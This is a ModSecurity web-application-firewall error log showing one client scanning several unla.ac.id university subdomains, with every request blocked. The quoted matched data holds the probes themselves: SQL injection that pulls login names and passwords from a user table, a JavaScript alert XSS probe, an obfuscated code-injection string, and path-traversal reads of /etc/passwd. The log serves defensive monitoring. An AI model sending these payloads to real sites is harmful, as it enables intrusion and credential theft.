[Tue Aug 29 11:48:04.463877 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x0d\\x0a# found within ARGS:uid: ,chr(97)) or 1: print chr(121) chr(101) chr(115)\\x0d\\x0a#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/audit/gui_detail_view.php"] [unique_id "ZO14hMCo-f0AAAkGCWsAAAAE"]
[Tue Aug 29 11:48:05.360925 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:url: javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "pusatbahasa.unla.ac.id"] [uri "/e/ViewImg/index.html"] [unique_id "ZO14hcCo-f0AAAj12BgAAAAa"]
[Tue Aug 29 11:48:05.383381 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: now( found within ARGS:id: -1 unmasterion semasterlect top 1 UserID,GroupID,LoginName,Password,now(),null,1  frmasterom {prefix}user"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/plug/comment/commentList.asp"] [unique_id "ZO14hcCo-f0AAAjCbOIAAAAB"]
[Tue Aug 29 11:48:05.397685 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: now( found within ARGS:id: -1 unmasterion semasterlect top 1 UserID,GroupID,LoginName,Password,now(),null,1  frmasterom {prefix}user"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/plug/comment/commentList.asp"] [unique_id "ZO14hcCo-f0AAAkGCW0AAAAE"]
[Tue Aug 29 11:48:05.400119 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: now( found within ARGS:id: -1 unmasterion semasterlect top 1 UserID,GroupID,LoginName,Password,now(),null,1  frmasterom {prefix}user"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/plug/comment/commentList.asp"] [unique_id "ZO14hcCo-f0AAAj12BkAAAAa"]
[Tue Aug 29 11:48:05.402387 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:url: javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "journal.unla.ac.id"] [uri "/e/ViewImg/index.html"] [unique_id "ZO14hcCo-f0AAAjtc6YAAAAX"]
[Tue Aug 29 11:48:05.431600 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:url: javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/e/ViewImg/index.html"] [unique_id "ZO14hcCo-f0AAAkGCW4AAAAE"]
[Tue Aug 29 11:48:05.434483 2023] [:error] [pid 2340] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:url: javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/e/ViewImg/index.html"] [unique_id "ZO14hcCo-f0AAAkksG4AAAAA"]
[Tue Aug 29 11:48:05.435994 2023] [:error] [pid 2341] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: now( found within ARGS:id: -1 unmasterion semasterlect top 1 UserID,GroupID,LoginName,Password,now(),null,1  frmasterom {prefix}user"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plug/comment/commentList.asp"] [unique_id "ZO14hcCo-f0AAAklewUAAAAD"]
[Tue Aug 29 11:48:05.448915 2023] [:error] [pid 2330] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:url: javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/e/ViewImg/index.html"] [unique_id "ZO14hcCo-f0AAAkaDBYAAAAJ"]
[Tue Aug 29 11:48:05.455946 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x0d\\x0a# found within ARGS:uid: ,chr(97)) or 1: print chr(121) chr(101) chr(115)\\x0d\\x0a#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/audit/gui_detail_view.php"] [unique_id "ZO14hcCo-f0AAAj12BsAAAAa"]
[Tue Aug 29 11:48:05.471851 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: now( found within ARGS:id: -1 unmasterion semasterlect top 1 UserID,GroupID,LoginName,Password,now(),null,1  frmasterom {prefix}user"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/plug/comment/commentList.asp"] [unique_id "ZO14hcCo-f0AAAkdu8MAAAAO"]
[Tue Aug 29 11:48:06.359929 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14hsCo-f0AAAj12BwAAAAa"]
[Tue Aug 29 11:48:06.362909 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:key: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/church-admin/display/download.php"] [unique_id "ZO14hsCo-f0AAAjy55gAAAAG"]
[Tue Aug 29 11:48:06.363786 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:key: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/church-admin/display/download.php"] [unique_id "ZO14hsCo-f0AAAjbw7MAAAAW"]
[Tue Aug 29 11:48:06.372445 2023] [:error] [pid 2340] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:key: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/church-admin/display/download.php"] [unique_id "ZO14hsCo-f0AAAkksHEAAAAA"]
[Tue Aug 29 11:48:06.377534 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:key: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/church-admin/display/download.php"] [unique_id "ZO14hsCo-f0AAAkdu8UAAAAO"]
[Tue Aug 29 11:48:06.384297 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:key: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/church-admin/display/download.php"] [unique_id "ZO14hsCo-f0AAAkNPs8AAAAI"]
[Tue Aug 29 11:48:06.404017 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:url: javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/e/ViewImg/index.html"] [unique_id "ZO14hsCo-f0AAAjbw7QAAAAW"]
[Tue Aug 29 11:48:06.405161 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO14hsCo-f0AAAj12B4AAAAa"]
[Tue Aug 29 11:48:06.416903 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14hsCo-f0AAAkdu8cAAAAO"]
[Tue Aug 29 11:48:06.424863 2023] [:error] [pid 2341] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14hsCo-f0AAAklewoAAAAD"]
[Tue Aug 29 11:48:06.441482 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14hsCo-f0AAAjy55wAAAAG"]
[Tue Aug 29 11:48:07.503857 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:path: /var/www/documentation/../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webui/file_guest"] [unique_id "ZO14h8Co-f0AAAhujAEAAAAr"]
[Tue Aug 29 11:48:07.568442 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:path: /var/www/documentation/../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/webui/file_guest"] [unique_id "ZO14h8Co-f0AAAkdu8sAAAAO"]
[Tue Aug 29 11:48:07.574758 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:path: /var/www/documentation/../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/webui/file_guest"] [unique_id "ZO14h8Co-f0AAAjtc60AAAAX"]
[Tue Aug 29 11:48:07.732514 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14h8Co-f0AAAj12CMAAAAa"]
[Tue Aug 29 11:48:07.815872 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:path: /var/www/documentation/../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/webui/file_guest"] [unique_id "ZO14h8Co-f0AAAjYrCkAAAAK"]
[Tue Aug 29 11:48:07.816897 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:path: /var/www/documentation/../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/webui/file_guest"] [unique_id "ZO14h8Co-f0AAAjM7I8AAAAT"]
[Tue Aug 29 11:48:07.817847 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:key: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/church-admin/display/download.php"] [unique_id "ZO14h8Co-f0AAAkAL-EAAAAU"]
[Tue Aug 29 11:48:08.358901 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:filename: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/download.action"] [unique_id "ZO14iMCo-f0AAAjM7JAAAAAT"]
[Tue Aug 29 11:48:08.378315 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:filename: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/download.action"] [unique_id "ZO14iMCo-f0AAAjM7JEAAAAT"]
[Tue Aug 29 11:48:08.396778 2023] [:error] [pid 2341] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:filename: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/download.action"] [unique_id "ZO14iMCo-f0AAAklexAAAAAD"]
[Tue Aug 29 11:48:08.399742 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:filename: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/download.action"] [unique_id "ZO14iMCo-f0AAAjM7JIAAAAT"]
[Tue Aug 29 11:48:08.402848 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:path: /var/www/documentation/../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/webui/file_guest"] [unique_id "ZO14iMCo-f0AAAj12CYAAAAa"]
[Tue Aug 29 11:48:08.420468 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:filename: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/download.action"] [unique_id "ZO14iMCo-f0AAAkdu80AAAAO"]
[Tue Aug 29 11:48:08.437738 2023] [:error] [pid 2340] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:filename: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/download.action"] [unique_id "ZO14iMCo-f0AAAkksHwAAAAA"]
